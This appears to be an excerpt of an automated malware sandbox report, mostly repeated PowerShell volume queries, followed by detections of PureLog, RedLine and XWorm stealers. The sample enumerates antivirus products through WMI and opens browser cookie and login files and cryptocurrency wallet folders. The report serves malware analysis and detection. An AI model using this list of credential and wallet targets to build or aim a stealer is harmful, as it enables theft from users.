Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Links\icqplewR.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F58B38 GetLocalTime,

3_2_03F58B38

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F69F00 GetUserNameA,

3_2_03F69F00

Source: C:\Users\user\AppData\Roaming\XClient.exe

Code function: 28_2_0040BBD4 GetTimeZoneInformation,

28_2_0040BBD4

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F5B038 GetVersionExA,

3_2_03F5B038

Source: C:\Users\user\Links\icqplewR.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 20.2.icqplewR.pif.1ce90f08.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e045570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cee0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.icqplewR.pif.1b19f4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1eeae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1eeae.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e046478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e062d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.icqplewR.pif.1b19f4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e062d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1fdb6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e046478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1fdb6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e045570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438467684.000000001CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: icqplewR.pif PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: icqplewR.pif PID: 7444, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
